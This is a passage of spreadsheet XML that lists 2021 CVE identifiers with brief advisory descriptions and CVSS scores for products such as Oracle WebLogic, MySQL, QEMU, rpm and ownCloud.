    <t>Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Coherence Container). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35618</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Cluster product of Oracle MySQL (component: Cluster: General). Supported versions that are affected are 8.0.26 and prior. Difficult to exploit vulnerability allows high privileged attacker with access to the physical communication segment attached to the hardware where the MySQL Cluster executes to compromise MySQL Cluster. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Cluster. CVSS 3.1 Base Score 1.8 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:N/A:L).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:N/A:L</t>
  </si>
  <si>
    <t>CVE-2021-35619</t>
  </si>
  <si>
    <t>Vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 19c and 21c. Difficult to exploit vulnerability allows low privileged attacker having Create Procedure privilege with network access via Oracle Net to compromise Java VM. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Java VM. CVSS 3.1 Base Score 7.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35620</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle WebLogic Server. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35621</t>
  </si>
  <si>
    <t>CVE-2021-35622</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption). Supported versions that are affected are 8.0.2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35623</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Roles). Supported versions that are affected are 8.0.26 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.1 Base Score 2.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35624</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 5.7.35 and prior and 8.0.26 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all MySQL Server accessible data. CVSS 3.1 Base Score 4.9 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35625</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 8.0.26 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.1 Base Score 2.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35626</t>
  </si>
  <si>
    <t>CVE-2021-35627</t>
  </si>
  <si>
    <t>CVE-2021-35628</t>
  </si>
  <si>
    <t>CVE-2021-35629</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.2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3563</t>
  </si>
  <si>
    <t>A flaw was found in openstack-keystone. Only the first 72 characters of an application secret are verified allowing attackers bypass some password complexity which administrators may be counting on. The highest threat from this vulnerability is to data confidentiality and integrity.</t>
  </si>
  <si>
    <t>CVE-2021-35630</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Options). Supported versions that are affected are 8.0.26 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all MySQL Server accessible data. CVSS 3.1 Base Score 4.9 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35631</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: GIS). Supported versions that are affected are 8.0.2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35632</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Data Dictionary). Supported versions that are affected are 8.0.26 and prior. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35633</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Logging). Supported versions that are affected are 8.0.26 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server. CVSS 3.1 Base Score 2.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L).</t>
  </si>
  <si>
    <t>CVE-2021-35634</t>
  </si>
  <si>
    <t>CVE-2021-35635</t>
  </si>
  <si>
    <t>CVE-2021-35636</t>
  </si>
  <si>
    <t>CVE-2021-35637</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PS). Supported versions that are affected are 8.0.2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35638</t>
  </si>
  <si>
    <t>CVE-2021-35639</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Stored Procedure). Supported versions that are affected are 8.0.2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3564</t>
  </si>
  <si>
    <t>A flaw double-free memory corruption in the Linux kernel HCI device initialization subsystem was found in the way user attach malicious HCI TTY Bluetooth device. A local user could use this flaw to crash the system. This flaw affects all the Linux kernel versions starting from 3.13.</t>
  </si>
  <si>
    <t>CVE-2021-35640</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 8.0.26 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35641</t>
  </si>
  <si>
    <t>CVE-2021-35642</t>
  </si>
  <si>
    <t>CVE-2021-35643</t>
  </si>
  <si>
    <t>CVE-2021-35644</t>
  </si>
  <si>
    <t>CVE-2021-35645</t>
  </si>
  <si>
    <t>CVE-2021-35646</t>
  </si>
  <si>
    <t>CVE-2021-35647</t>
  </si>
  <si>
    <t>CVE-2021-35648</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: FTS). Supported versions that are affected are 8.0.2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1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35649</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Secure Global Desktop product of Oracle Virtualization (component: Server). The supported version that is affected is 5.6. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise Oracle Secure Global Desktop. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Secure Global Desktop accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Secure Global Desktop. CVSS 3.1 Base Score 5.4 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L).</t>
  </si>
  <si>
    <t>CVE-2021-3565</t>
  </si>
  <si>
    <t>A flaw was found in tpm2-tools in versions before 5.1.1 and before 4.3.2. tpm2_import used a fixed AES key for the inner wrapper, potentially allowing a MITM attacker to unwrap the inner portion and reveal the key being imported. The highest threat from this vulnerability is to data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2021-35650</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Secure Global Desktop product of Oracle Virtualization (component: Client). The supported version that is affected is 5.6. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise Oracle Secure Global Desktop. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Secure Global Desktop accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Secure Global Desktop. CVSS 3.1 Base Score 4.6 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L</t>
  </si>
  <si>
    <t>CVE-2021-35651</t>
  </si>
  <si>
    <t>Vulnerability in the Essbase Administration Services product of Oracle Essbase (component: EAS Console). The supported versions that are affected are Prior to 11.1.2.4.046 and Prior to 21.3. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Essbase Administration Services. While the vulnerability is in Essbase Administration Services, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Essbase Administration Services accessible data as well as unauthorized update, insert or delete access to some of Essbase Administration Services accessible data. CVSS 3.1 Base Score 8.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35652</t>
  </si>
  <si>
    <t>Vulnerability in the Essbase Administration Services product of Oracle Essbase (component: EAS Console). The supported versions that are affected are Prior to 11.1.2.4.046 and Prior to 21.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Essbase Administration Services. While the vulnerability is in Essbase Administration Services, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Essbase Administration Services. CVSS 3.1 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35653</t>
  </si>
  <si>
    <t>Vulnerability in the Essbase Administration Services product of Oracle Essbase (component: EAS Console). The supported versions that are affected are Prior to 11.1.2.4.046 and Prior to 21.3. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Essbase Administration Services. While the vulnerability is in Essbase Administration Services, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Essbase Administration Services accessible data. CVSS 3.1 Base Score 7.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35654</t>
  </si>
  <si>
    <t>Vulnerability in the Essbase Administration Services product of Oracle Essbase (component: EAS Console). The supported versions that are affected are Prior to 11.1.2.4.046 and Prior to 21.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Essbase Administration Services. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Essbase Administration Services. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35655</t>
  </si>
  <si>
    <t>Vulnerability in the Essbase Administration Services product of Oracle Essbase (component: EAS Console). The supported versions that are affected are Prior to 11.1.2.4.046 and Prior to 21.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Essbase Administration Services. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Essbase Administration Services accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35656</t>
  </si>
  <si>
    <t>CVE-2021-35657</t>
  </si>
  <si>
    <t>CVE-2021-35658</t>
  </si>
  <si>
    <t>CVE-2021-35659</t>
  </si>
  <si>
    <t>CVE-2021-3566</t>
  </si>
  <si>
    <t>Prior to ffmpeg version 4.3, the tty demuxer did not have a 'read_probe' function assigned to it. By crafting a legitimate "ffconcat" file that references an image, followed by a file the triggers the tty demuxer, the contents of the second file will be copied into the output file verbatim (as long as the `-vcodec copy` option is passed to ffmpeg).</t>
  </si>
  <si>
    <t>CVE-2021-35660</t>
  </si>
  <si>
    <t>CVE-2021-35661</t>
  </si>
  <si>
    <t>CVE-2021-35662</t>
  </si>
  <si>
    <t>CVE-2021-35665</t>
  </si>
  <si>
    <t>Vulnerability in the Hyperion Financial Reporting product of Oracle Hyperion (component: Repository). The supported version that is affected is 11.2.6.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Hyperion Financial Reporting. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Hyperion Financial Reporting, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Hyperion Financial Reporting accessible data as well as unauthorized read access to a subset of Hyperion Financial Reporting accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35666</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle HTTP Server product of Oracle Fusion Middleware (component: OSSL Module). The supported version that is affected is 11.1.1.9.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle HTTP Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle HTTP Server accessible data. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-3567</t>
  </si>
  <si>
    <t>A flaw was found in Caribou due to a regression of CVE-2020-25712 fix. An attacker could use this flaw to bypass screen-locking applications that leverage Caribou as an input mechanism. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2021-35683</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Essbase Administration Services product of Oracle Essbase (component: EAS Console). The supported version that is affected is Prior to 11.1.2.4.047. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Essbase Administration Services. While the vulnerability is in Oracle Essbase Administration Services, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Essbase Administration Services. CVSS 3.1 Base Score 9.9 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2021-35686</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Unified Metadata Manager). Supported versions that are affected are 8.0.7-8.1.1. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Financial Services Analytical Applications Infrastructure accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35687</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Unified Metadata Manager). Supported versions that are affected are 8.0.7-8.1.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Financial Services Analytical Applications Infrastructure accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2021-35689</t>
  </si>
  <si>
    <t>A potential vulnerability in the Oracle Talent Acquisition Cloud - Taleo Enterprise Edition. This high severity potential vulnerability allows attackers to perform remote code execution on Taleo Enterprise Edition system. Successful attacks of this vulnerability can result in unauthorized remote code execution within Taleo Enterprise Edition and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Talent Acquisition Cloud - Taleo Enterprise Edition. All affected customers were notified of CVE-2021-35689 by Oracle.</t>
  </si>
  <si>
    <t>CVE-2021-3569</t>
  </si>
  <si>
    <t>A stack corruption bug was found in libtpms in versions before 0.7.2 and before 0.8.0 while decrypting data using RSA. This flaw could result in a SIGBUS (bad memory access) and termination of swtpm. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2021-3570</t>
  </si>
  <si>
    <t>A flaw was found in the ptp4l program of the linuxptp package. A missing length check when forwarding a PTP message between ports allows a remote attacker to cause an information leak, crash, or potentially remote code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. This flaw affects linuxptp versions before 3.1.1, before 2.0.1, before 1.9.3, before 1.8.1, before 1.7.1, before 1.6.1 and before 1.5.1.</t>
  </si>
  <si>
    <t>CVE-2021-3571</t>
  </si>
  <si>
    <t>A flaw was found in the ptp4l program of the linuxptp package. When ptp4l is operating on a little-endian architecture as a PTP transparent clock, a remote attacker could send a crafted one-step sync message to cause an information leak or crash. The highest threat from this vulnerability is to data confidentiality and system availability. This flaw affects linuxptp versions before 3.1.1 and before 2.0.1.</t>
  </si>
  <si>
    <t>CVE-2021-3572</t>
  </si>
  <si>
    <t>A flaw was found in python-pip in the way it handled Unicode separators in git references. A remote attacker could possibly use this issue to install a different revision on a repository. The highest threat from this vulnerability is to data integrity. This is fixed in python-pip version 21.1.</t>
  </si>
  <si>
    <t>CVE-2021-3573</t>
  </si>
  <si>
    <t>A use-after-free in function hci_sock_bound_ioctl() of the Linux kernel HCI subsystem was found in the way user calls ioct HCIUNBLOCKADDR or other way triggers race condition of the call hci_unregister_dev() together with one of the calls hci_sock_blacklist_add(), hci_sock_blacklist_del(), hci_get_conn_info(), hci_get_auth_info(). A privileged local user could use this flaw to crash the system or escalate their privileges on the system. This flaw affects the Linux kernel versions prior to 5.13-rc5.</t>
  </si>
  <si>
    <t>CVE-2021-3574</t>
  </si>
  <si>
    <t>A vulnerability was found in ImageMagick-7.0.11-5, where executing a crafted file with the convert command, ASAN detects memory leaks.</t>
  </si>
  <si>
    <t>CVE-2021-3575</t>
  </si>
  <si>
    <t>A heap-based buffer overflow was found in openjpeg in color.c:379:42 in sycc420_to_rgb when decompressing a crafted .j2k file. An attacker could use this to execute arbitrary code with the permissions of the application compiled against openjpeg.</t>
  </si>
  <si>
    <t>CVE-2021-3576</t>
  </si>
  <si>
    <t>Execution with Unnecessary Privileges vulnerability in Bitdefender Endpoint Security Tools, Total Security allows a local attacker to elevate to 'NT AUTHORITY\System. Impersonation enables the server thread to perform actions on behalf of the client but within the limits of the client's security context. This issue affects: Bitdefender Endpoint Security Tools versions prior to 7.2.1.65. Bitdefender Total Security versions prior to 25.0.26.</t>
  </si>
  <si>
    <t>CVE-2021-3577</t>
  </si>
  <si>
    <t>An unauthenticated remote code execution vulnerability was reported in some Motorola-branded Binatone Hubble Cameras that could allow an attacker on the same network unauthorized access to the device.</t>
  </si>
  <si>
    <t>CVE-2021-3578</t>
  </si>
  <si>
    <t>A flaw was found in mbsync before v1.3.6 and v1.4.2, where an unchecked pointer cast allows a malicious or compromised server to write an arbitrary integer value past the end of a heap-allocated structure by issuing an unexpected APPENDUID response. This could be plausibly exploited for remote code execution on the client.</t>
  </si>
  <si>
    <t>CVE-2021-3579</t>
  </si>
  <si>
    <t>Incorrect Default Permissions vulnerability in the bdservicehost.exe and Vulnerability.Scan.exe components as used in Bitdefender Endpoint Security Tools for Windows, Total Security allows a local attacker to elevate privileges to NT AUTHORITY\SYSTEM This issue affects: Bitdefender Endpoint Security Tools for Windows versions prior to 7.2.1.65. Bitdefender Total Security versions prior to 7.2.1.65.</t>
  </si>
  <si>
    <t>CVE-2021-3580</t>
  </si>
  <si>
    <t>A flaw was found in the way nettle's RSA decryption functions handled specially crafted ciphertext. An attacker could use this flaw to provide a manipulated ciphertext leading to application crash and denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-3581</t>
  </si>
  <si>
    <t>Buffer Access with Incorrect Length Value in zephyr. Zephyr versions &gt;= &gt;=2.5.0 contain Buffer Access with Incorrect Length Value (CWE-805). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-8q65-5gqf-fmw5</t>
  </si>
  <si>
    <t>CVE-2021-3582</t>
  </si>
  <si>
    <t>A flaw was found in the QEMU implementation of VMWare's paravirtual RDMA device. The issue occurs while handling a "PVRDMA_CMD_CREATE_MR" command due to improper memory remapping (mremap). This flaw allows a malicious guest to crash the QEMU process on the host. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2021-3583</t>
  </si>
  <si>
    <t>A flaw was found in Ansible, where a user's controller is vulnerable to template injection. This issue can occur through facts used in the template if the user is trying to put templates in multi-line YAML strings and the facts being handled do not routinely include special template characters. This flaw allows attackers to perform command injection, which discloses sensitive information. The highest threat from this vulnerability is to confidentiality and integrity.</t>
  </si>
  <si>
    <t>CVE-2021-3584</t>
  </si>
  <si>
    <t>A server side remote code execution vulnerability was found in Foreman project. A authenticated attacker could use Sendmail configuration options to overwrite the defaults and perform command injection. The highest threat from this vulnerability is to confidentiality, integrity and availability of system. Fixed releases are 2.4.1, 2.5.1, 3.0.0.</t>
  </si>
  <si>
    <t>CVE-2021-3585</t>
  </si>
  <si>
    <t>A flaw was found in openstack-tripleo-heat-templates. Plain passwords from RHSM exist in the logs during OSP13 deployment with subscription-manager.</t>
  </si>
  <si>
    <t>CVE-2021-3586</t>
  </si>
  <si>
    <t>A flaw was found in servicemesh-operator. The NetworkPolicy resources installed for Maistra do not properly specify which ports may be accessed, allowing access to all ports on these resources from any pod. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-3588</t>
  </si>
  <si>
    <t>The cli_feat_read_cb() function in src/gatt-database.c does not perform bounds checks on the 'offset' variable before using it as an index into an array for reading.</t>
  </si>
  <si>
    <t>CVE-2021-3589</t>
  </si>
  <si>
    <t>An authorization flaw was found in Foreman Ansible. An authenticated attacker with certain permissions to create and run Ansible jobs can access hosts through job templates. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-3590</t>
  </si>
  <si>
    <t>A flaw was found in Foreman project. A credential leak was identified which will expose Azure Compute Profile password through JSON of the API output. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-3592</t>
  </si>
  <si>
    <t>An invalid pointer initialization issue was found in the SLiRP networking implementation of QEMU. The flaw exists in the bootp_input() function and could occur while processing a udp packet that is smaller than the size of the 'bootp_t' structure. A malicious guest could use this flaw to leak 10 bytes of uninitialized heap memory from the host. The highest threat from this vulnerability is to data confidentiality. This flaw affects libslirp versions prior to 4.6.0.</t>
  </si>
  <si>
    <t>CVE-2021-3593</t>
  </si>
  <si>
    <t>An invalid pointer initialization issue was found in the SLiRP networking implementation of QEMU. The flaw exists in the udp6_input() function and could occur while processing a udp packet that is smaller than the size of the 'udphdr' structure. This issue may lead to out-of-bounds read access or indirect host memory disclosure to the guest. The highest threat from this vulnerability is to data confidentiality. This flaw affects libslirp versions prior to 4.6.0.</t>
  </si>
  <si>
    <t>CVE-2021-35936</t>
  </si>
  <si>
    <t>If remote logging is not used, the worker (in the case of CeleryExecutor) or the scheduler (in the case of LocalExecutor) runs a Flask logging server and is listening on a specific port and also binds on 0.0.0.0 by default. This logging server had no authentication and allows reading log files of DAG jobs. This issue affects Apache Airflow &lt; 2.1.2.</t>
  </si>
  <si>
    <t>CVE-2021-35937</t>
  </si>
  <si>
    <t>A race condition vulnerability was found in rpm. A local unprivileged user could use this flaw to bypass the checks that were introduced in response to CVE-2017-7500 and CVE-2017-7501, potentially gaining root privileges. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-35938</t>
  </si>
  <si>
    <t>A symbolic link issue was found in rpm. It occurs when rpm sets the desired permissions and credentials after installing a file. A local unprivileged user could use this flaw to exchange the original file with a symbolic link to a security-critical file and escalate their privileges on the system. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-35939</t>
  </si>
  <si>
    <t>It was found that the fix for CVE-2017-7500 and CVE-2017-7501 was incomplete: the check was only implemented for the parent directory of the file to be created. A local unprivileged user who owns another ancestor directory could potentially use this flaw to gain root privileges. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-3594</t>
  </si>
  <si>
    <t>An invalid pointer initialization issue was found in the SLiRP networking implementation of QEMU. The flaw exists in the udp_input() function and could occur while processing a udp packet that is smaller than the size of the 'udphdr' structure. This issue may lead to out-of-bounds read access or indirect host memory disclosure to the guest. The highest threat from this vulnerability is to data confidentiality. This flaw affects libslirp versions prior to 4.6.0.</t>
  </si>
  <si>
    <t>CVE-2021-35940</t>
  </si>
  <si>
    <t>An out-of-bounds array read in the apr_time_exp*() functions was fixed in the Apache Portable Runtime 1.6.3 release (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch, and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue.</t>
  </si>
  <si>
    <t>CVE-2021-35941</t>
  </si>
  <si>
    <t>Western Digital WD My Book Live (2.x and later) and WD My Book Live Duo (all versions) have an administrator API that can perform a system factory restore without authentication, as exploited in the wild in June 2021, a different vulnerability than CVE-2018-18472.</t>
  </si>
  <si>
    <t>CVE-2021-35942</t>
  </si>
  <si>
    <t>The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted, crafted pattern, potentially resulting in a denial of service or disclosure of information. This occurs because atoi was used but strtoul should have been used to ensure correct calculations.</t>
  </si>
  <si>
    <t>CVE-2021-35943</t>
  </si>
  <si>
    <t>Couchbase Server 6.5.x and 6.6.x through 6.6.2 has Incorrect Access Control. Externally managed users are not prevented from using an empty password, per RFC4513.</t>
  </si>
  <si>
    <t>CVE-2021-35944</t>
  </si>
  <si>
    <t>Couchbase Server 6.5.x, 6.6.x through 6.6.2, and 7.0.0 has a Buffer Overflow. A specially crafted network packet sent from an attacker can crash memcached.</t>
  </si>
  <si>
    <t>CVE-2021-35945</t>
  </si>
  <si>
    <t>Couchbase Server 6.5.x, 6.6.0 through 6.6.2, and 7.0.0, has a Buffer Overflow. A specially crafted network packet sent from an attacker can crash memcached.</t>
  </si>
  <si>
    <t>CVE-2021-35946</t>
  </si>
  <si>
    <t>A receiver of a federated share with access to the database with ownCloud version before 10.8 could update the permissions and therefore elevate their own permissions.</t>
  </si>
  <si>
    <t>CVE-2021-35947</t>
  </si>
  <si>
    <t>The public share controller in the ownCloud server before version 10.8.0 allows a remote attacker to see the internal path and the username of a public share by including invalid characters in the URL.</t>
  </si>
  <si>
    <t>CVE-2021-35948</t>
  </si>
  <si>
    <t>Session fixation on password protected public links in the ownCloud Server before 10.8.0 allows an attacker to bypass the password protection when they can force a target client to use a controlled cookie.</t>
  </si>
  <si>
    <t>CVE-2021-35949</t>
  </si>
  <si>
    <t>The shareinfo controller in the ownCloud Server before 10.8.0 allows an attacker to bypass the permission checks for upload only shares and list metadata about the share.</t>
  </si>
  <si>
    <t>CVE-2021-3595</t>
  </si>
  <si>
